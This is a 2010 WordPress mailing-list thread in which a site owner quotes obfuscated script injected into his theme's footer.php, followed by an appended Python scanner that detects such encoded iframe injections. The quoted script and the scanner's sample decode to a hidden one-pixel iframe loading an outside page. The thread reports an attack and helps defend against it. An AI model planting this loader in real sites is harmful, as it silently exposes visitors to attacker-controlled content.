[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Vid Luther vid at zippykid.com
Sun Oct 31 16:51:32 UTC 2010


try the free wordpress.com account? :) we just want you to stick with
wordpress :)

Mladen Adamovic wrote:
> Regarding hosting - I have other websites hosted at my dreamhost account and
> they haven't been hacked so far. That's good otherwise I'll have
> days of work to fix it.
>
> Godaddy has a slow and unresponsive panel compared to dreamhost - I have some
> websites hosted there as well.
>
> I understand that some individuals and companies are offering Wordpress
> hosting however for me Blogger could do - and it's free. Since my blog has
> around 25 readers I don't have economical reasons to pay for managed
> wordpress hosting.
>
> Regards
>
>
>
> On Sun, Oct 31, 2010 at 4:17 PM, Vid Luther <vid at zippykid.com> wrote:
>
>> Mladen,
>>  Instead of switching platforms completely, I would recommend first
>> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
>> wpengine, my company, or even godaddy.. their UI sucks, but their phone
>> support is fairly decent.
>>
>> As for the exploit, it may not be a wordpress exploit, but an ftp
>> attack, as it's just looking for filesystem paths and injecting to it.
>>
>> I'm assuming by default theme footer, you meant twentyten theme, and
>> footer.php ?
>>
>>
>>
>> Mladen Adamovic wrote:
>>> Hi guys,
>>>
>>> My wordpress software instance was repeatedly hacked ... running latest
>>> Wordpress source code and being hosted on Dreamhost.
>>>
>>> I don't know which exploit it did use and couldn't identify it, but it was
>>> adding the following code to my default theme footer.php:
>>>
>>> <script>
>>> enc =
>>> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
>>> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
>>> dec = unescape(enc);
>>> document.write(dec);
>>> </script>
>>>
>>> I think I'll have to migrate to Blogger, since I couldn't identify exploit
>>> it did use.
>>>
>>> I wanted to drop you an email anyhow since identifying exploits is
>>> important!
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>> --
>> Vid Luther
>> Founder
>> ZippyKid
>> http://zippykid.com/
>> 210-789-0369

-- 
Vid Luther
Founder
ZippyKid
http://zippykid.com/
210-789-0369
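
Added example, not part of the original thread: a small Python check a site owner could run over theme files to spot the pattern quoted above, a percent-encoded string literal that decodes to an iframe. The function names, the sample footer and the injected.example.invalid host are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Quoted string literal containing at least one %XX escape (may span lines).
LITERAL = re.compile(
    r"""(["'])((?:(?!\1).)*%[0-9A-Fa-f]{2}(?:(?!\1).)*)\1""", re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.I)
TINY = re.compile(r"""\b(?:width|height)\s*=\s*['"]?[01]\b""", re.I)

def find_injected_iframes(text):
    """Return one finding per iframe hidden inside an encoded literal."""
    findings = []
    for m in LITERAL.finditer(text):
        # Undo line wrapping inside the literal, then percent-decode it,
        # which is what the injected unescape() call does in the browser.
        decoded = unquote(re.sub(r"\s*\n\s*", "", m.group(2)))
        for tag in IFRAME.finditer(decoded):
            src = SRC.search(tag.group(0))
            findings.append({
                "line": text.count("\n", 0, m.start()) + 1,
                "src": src.group(1) if src else None,
                "hidden": bool(TINY.search(tag.group(0))),  # 0/1 pixel frame
            })
    return findings

def scan_theme(theme_dir):
    """Scan every .php file under theme_dir (path supplied by the caller)."""
    report = {}
    for path in Path(theme_dir).rglob("*.php"):
        hits = find_injected_iframes(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample footer.php; the host is a placeholder, not a real IoC.
SAMPLE_FOOTER = '''<div id="footer">
<?php wp_footer(); ?>
<script>
enc = "%3Ciframe%20width%3D1%20height%3D1%20frameborder%3D0%20src%3D%27http%3A//
injected.example.invalid/x.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
</div>'''

if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_FOOTER):
        print(hit)
```

A hit only shows that a file was modified; since the thread raises FTP access as a possible route, comparing file modification times with the host's FTP and web logs is the natural next step.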